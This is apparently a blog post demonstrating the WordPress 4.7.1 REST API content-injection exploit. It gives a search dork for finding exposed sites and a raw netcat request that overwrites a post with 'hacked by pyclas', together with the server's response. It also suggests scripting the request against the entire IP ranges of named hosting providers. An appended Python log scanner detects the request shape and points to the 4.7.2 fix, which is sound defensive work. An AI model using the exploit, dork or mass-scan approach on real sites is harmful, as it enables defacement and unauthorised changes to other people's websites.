Pyclas on Security

pyclas@xmpp.cm (OTR)

Wow! You're a Friend who's good at WordPress REST API Exploitation!


It's all the rage right now, so I gave it a try. You could just run the Python script grabbed from ExploitDB, but I wanted to do it with netcat, so netcat it was.

If you wanted to do this for real, you'd wrap netcat in a shell script or similar and throw the request described under "How to check" at every address in the ranges owned by GMO VPS or Sakura Internet.

Versions tested

Apache Version

  • Apache/2.4.18 (Ubuntu) (from the Server response header below)

MySQL Version

  • Server version 5.7.17-0ubuntu0.16.04.1

PHP

WordPress

  • $wp_version = '4.7.1';

Dork

inurl:index.php/wp-json/wp/v2

How to check

root@kali:~# netcat -nvv 192.168.12.63 80
(UNKNOWN) [192.168.12.63] 80 (http) open
GET /wordpress/index.php/wp-json/wp/v2/posts HTTP/1.1
Accept-Encoding: identity
Host: 192.168.12.63
Connection: close
User-Agent: Python-urllib/2.7

HTTP/1.1 200 OK
Date: Sun, 12 Feb 2017 14:44:43 GMT
Server: Apache/2.4.18 (Ubuntu)
X-Robots-Tag: noindex
Link: <http://192.168.12.63/wordpress/index.php/wp-json/>; rel="https://api.w.org/"
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages
Access-Control-Allow-Headers: Authorization, Content-Type
X-WP-Total: 3
X-WP-TotalPages: 1
Allow: GET
Content-Length: 5138
Connection: close
Content-Type: application/json; charset=UTF-8

[{"id":7,"date":"2017-02-12T23:10:34","date_gmt":"2017-02-12T14:10:34","guid":{"rendered":"http:\/\/192.168.12.63\/wordpress\/?p=7"},"modified":"2017-02-12T23:10:34","modified_gmt":"2017-02-12T14:10:34","slug":"1","type":"post","link":"http:\/\/192.168.12.63\/wordpress\/index.php\/2017\/02\/12\/1\/","title":{"rendered":"test"},"content":{"rendered":"<p>test<\/p>\n","protected":false},"excerpt":{"rendered":"<p>test<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/posts\/7"}],"collection":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/comments?post=7"}],"version-history":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/posts\/7\/revisions"}],"wp:attachment":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/media?parent=7"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/categories?post=7"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/tags?post=7"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}},{"id":4,"date":"2017-02-10T16:25:11","date_gmt":"2017-02-10T07:25:11","guid":{"rendered":"http:\/\/192.168.12.63\/wordpress\/?p=4"},"modified":"2017-02-10T16:25:11","modified_gmt":"2017-02-10T07:25:11","slug":"aaaa","type":"post","link":"http:\/\/192.168.12.63\/wordpress\/index.php\/2017\/02\/10\/aaaa\/","title":{"rendered":"aaaa"},"content":{"rendered":"<p>aaaa<\/p>\n","protected":false},"excerpt":{"rendered":"<p>aaaa<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/posts\/4"}],"collection":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/comments?post=4"}],"version-history":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/posts\/4\/revisions"}],"wp:attachment":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/media?parent=4"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/categories?post=4"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/tags?post=4"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}},{"id":1,"date":"2017-02-10T16:22:49","date_gmt":"2017-02-10T07:22:49","guid":{"rendered":"http:\/\/192.168.12.63\/wordpress\/?p=1"},"modified":"2017-02-12T23:45:59","modified_gmt":"2017-02-12T14:45:59","slug":"hello-world","type":"post","link":"http:\/\/192.168.12.63\/wordpress\/index.php\/2017\/02\/10\/hello-world\/","title":{"rendered":"Hello world!"},"content":{"rendered":"<p>test<\/p>\n","protected":false},"excerpt":{"rendered":"<p>test<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/posts\/1"}],"collection":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/comments?post=1"}],"version-history":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/posts\/1\/revisions"}],"wp:attachment":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/media?parent=1"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/categories?post=1"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/tags?post=1"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}] sent 149, rcvd 5621
root@kali:~# 

Attack

POST /wordpress/index.php/wp-json/wp/v2/posts/1/?id=1abc HTTP/1.1
Accept-Encoding: identity
Content-Length: 33
Host: 192.168.12.63
Content-Type: application/json
Connection: close
User-Agent: Python-urllib/2.7

{"content": "hacked by pyclas\n"}
HTTP/1.1 200 OK
Date: Sun, 12 Feb 2017 14:16:45 GMT
Server: Apache/2.4.18 (Ubuntu)
X-Robots-Tag: noindex
Link: <http://192.168.12.63/wordpress/index.php/wp-json/>; rel="https://api.w.org/"
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages
Access-Control-Allow-Headers: Authorization, Content-Type
Allow: POST, PUT, PATCH, DELETE
Content-Length: 1890
Connection: close
Content-Type: application/json; charset=UTF-8

{"id":1,"date":"2017-02-10T16:22:49","date_gmt":"2017-02-10T07:22:49","guid":{"rendered":"http:\/\/192.168.12.63\/wordpress\/?p=1","raw":"http:\/\/192.168.12.63\/wordpress\/?p=1"},"modified":"2017-02-12T23:16:45","modified_gmt":"2017-02-12T14:16:45","password":"","slug":"hello-world","status":"publish","type":"post","link":"http:\/\/192.168.12.63\/wordpress\/index.php\/2017\/02\/10\/hello-world\/","title":{"raw":"Hello world!","rendered":"Hello world!"},"content":{"raw":"hacked by pyclas\n","rendered":"<p>hacked by pyclas<\/p>\n","protected":false},"excerpt":{"raw":"","rendered":"<p>hacked by pyclas<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/posts\/1"}],"collection":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/comments?post=1"}],"version-history":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/posts\/1\/revisions"}],"wp:attachment":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/media?parent=1"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/categories?post=1"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/tags?post=1"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
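As an added defensive example (not from the original post), the Python below checks web server access logs for the request shape shown above: a write to /wp/v2/posts/<n> carrying a query-string id that is not the same plain integer as <n>. The log lines are constructed, and the regex assumes Apache combined log format.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Methods that modify a post through the WP REST posts controller
WRITE_METHODS = {"POST", "PUT", "PATCH", "DELETE"}
# Route as seen in a pretty-permalink path or in a ?rest_route= value
POSTS_ROUTE = re.compile(r"/wp/v2/posts/(\d+)/?$")
# Apache combined log: client ... "METHOD target HTTP/x" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def route_post_id(target):
    """Return (post id named by the route or None, parsed query string)."""
    parts = urlsplit(target)
    qs = parse_qs(parts.query, keep_blank_values=True)
    for candidate in [parts.path] + qs.get("rest_route", []):
        m = POSTS_ROUTE.search(candidate)
        if m:
            return m.group(1), qs
    return None, qs

def is_id_override(method, target):
    """True for a write to /wp/v2/posts/<n> whose query-string id is not the same
    plain integer as <n> (the 4.7.0/4.7.1 request shape); conservative by design."""
    if method.upper() not in WRITE_METHODS:
        return False
    route_id, qs = route_post_id(target)
    if route_id is None or "id" not in qs:
        return False
    query_id = qs["id"][0]
    return not (query_id.isdigit() and int(query_id) == int(route_id))

def scan_log(lines):
    """Return (client, method, target, status) for each matching request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_id_override(m.group(2), m.group(3)):
            client, method, target, status = m.groups()
            hits.append((client, method, target, int(status)))
    return hits

# Constructed sample lines; the first mirrors the request shown above
SAMPLE_LOG = [
    '192.168.12.1 - - [12/Feb/2017:23:16:45 +0900] "POST /wordpress/index.php/wp-json/wp/v2/posts/1/?id=1abc HTTP/1.1" 200 1890 "-" "Python-urllib/2.7"',
    '192.168.12.1 - - [12/Feb/2017:23:44:43 +0900] "GET /wordpress/index.php/wp-json/wp/v2/posts HTTP/1.1" 200 5138 "-" "Python-urllib/2.7"',
    '192.168.12.1 - - [12/Feb/2017:23:50:01 +0900] "POST /wordpress/?rest_route=/wp/v2/posts/4&id=4x HTTP/1.1" 200 1700 "-" "curl/7.52.1"',
    '192.168.12.1 - - [12/Feb/2017:23:51:10 +0900] "PUT /wordpress/index.php/wp-json/wp/v2/posts/4?id=4 HTTP/1.1" 401 120 "-" "curl/7.52.1"',
]
```

The actual fix is updating to WordPress 4.7.2; this check only helps to hunt for attempts against hosts that were still on 4.7.0 or 4.7.1.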

Result

[screenshot]